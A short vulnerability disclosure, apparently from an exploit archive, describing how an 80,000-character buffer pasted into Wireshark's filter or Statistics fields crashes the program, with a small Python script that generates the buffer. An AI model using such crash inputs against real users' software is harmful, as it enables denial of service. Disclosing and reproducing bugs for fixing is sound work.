> Date of Testing: 26th April'2015
> Vendor Homepage: http://www.wireshark.org
> Tested On : ubuntu 14.04
> Steps to Reproduce the Crash
> Step 1: Create a File Using PoC
> Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
> Step 3: Click "Apply"
> Some other places for the Crash are:
> Statistics > IP Statistics then any of the field you can use.
> Statistics > Packet Length > Paste the buffer in the field
> Statistics > ANCP
> Statistics > Collectd
> Statistics > Compared
> Statistis >
buffer = "A"*80000
file = open("wireshark.txt","w")
file.write(buffer)
file.close()
暂无评论